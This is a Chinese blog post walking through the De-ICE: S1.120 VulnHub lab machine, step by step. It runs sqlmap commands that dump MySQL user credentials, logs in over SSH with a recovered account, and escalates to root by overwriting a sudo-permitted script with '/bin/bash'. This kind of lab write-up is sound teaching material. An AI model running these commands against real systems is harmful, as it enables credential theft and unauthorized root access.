De-ICE:S1.120靶机

最新推荐文章于 2024-08-28 21:14:18 发布
最新推荐文章于 2024-08-28 21:14:18 发布
阅读量254 收藏 10
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/140812472
版权

一、主机发现

1.两者改为仅主机并改为1段

2.找到ip

二、信息收集

1.访问页面

2.点击,这里使用了网页翻译

输入,提交

查看产品,可以看到刚刚提交的东西

并且有id值

3.使用sqlmap跑一下

sqlmap -u 'http://192.168.1.120/products.php?id=1' --batch

存在sql注入

三、利用

1.查看数据表名

sqlmap -u 'http://192.168.1.120/products.php?id=1' --dbs --batch

结果

查看mysql数据库,检索用户和密码信息

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

结果,很多

2.使用ccoffee尝试链接ssh

ssh ccoffee@192.168.1.120

输入密码,连接成功

四、提权

1.查找suid目录

find / -perm -u=s -type f 2>/dev/null

2.可以看到ccoffee用户在此路径下,可以执行 .sh中的命令

执行 sudo -l 时不需要密码

3.切换到/home/ccoffee/scripts/

并将 getlogs.sh 移动到 getlogs.sh.bak,接着创建 getlogs.sh 文件以生成 shell

mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

4.使用sudo执行新创建的文件

sudo /home/ccoffee/scripts/getlogs.sh

5.提权成功

蓝天模糊
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1467
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
De-ICE_S1.120靶机
zdd1453691081的博客
07-29 158
【代码】De-ICE_S1.120靶机
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 347
【代码】De-ICE_S1.120靶机渗透测试。
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 465
vulnhub
DE-ICE: S1.120打靶【附POC】(权限提升)
weixin_52487093的博客
07-30 537
1.安装虚拟主机,主机发现不了已解决;2.kali利用ssh连接不了,已找到替补方案;3.SUID提权
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 405
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
【vulnhub】De-ICES1.120靶机
wbplife的博客
08-11 262
在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令。在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码。将 getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell。
De-ICE_S1.120靶机复现
weixin_52956666的博客
07-30 341
将getlogs.sh更改为其他名字,将/bin/bash改为getlogs.sh。到/home/ccoffee/scripts路径下。将kali和靶机都设置为仅主机模式。因为ssh服务开启,尝试远程连接。发现存在免密getlogs.sh。点击Add product。输入发现存在反射型xss注入。查看mysql数据库的表。使用sqlmap查询。
De-ICE_S1.120靶机 带提权
weixin_71232352的博客
07-30 381
1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.1.0网段网卡,将靶机设置成仅主机模式。2.使用sudo提权发现不可以使用suid提权。8.发现url有id=1 尝试sql注入漏洞。9.通过sqlmap跑出来用户名跟密码。执行生成的文件并输入id发现提权成功。1.发现是Linux系统。4.首先访问80端口。
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
『VulnHub系列』DC- 1-Walkthrough.pdf
10-30
在文档中,作者ins1ght详细介绍了DC-1靶机的攻略方法,内容涵盖了信息收集、漏洞利用、提权等多个环节。文档中提到的工具包括netdiscover、nmap、Metasploit等,这些都是渗透测试中常用到的工具。 信息收集是进行...
一起打靶-Breach-2-final2.1.xss上线
09-28
知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的生产环境场景,带有许多twists 和 trolls...
安全面试常见问题任意文件下载
persist213的博客
08-24 733
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
经验笔记:Token、Session、Cookie 及密码级别安全存储
最新发布
qq_45831414的博客
08-28 327
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 363
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 545
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
你的软件系统安全
温故而知新
08-22 981
如果你的软件系统可以通过网络访问, 可以由多人操作, 可以访问或操作敏感数据, 或者可能暴露隐私, 等等, 请一定要保护你的系统. 那么你的软件系统安全吗? 一. 先问自己如下 4 个问题 1. What are we working on? 我们的系统在干啥? 例如电商系统: 我们在卖啥? 提供什么售前和售后服务? 用户和帐备信息怎么管理的? 数据是如何防护和归档的? 等等 2. What ...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值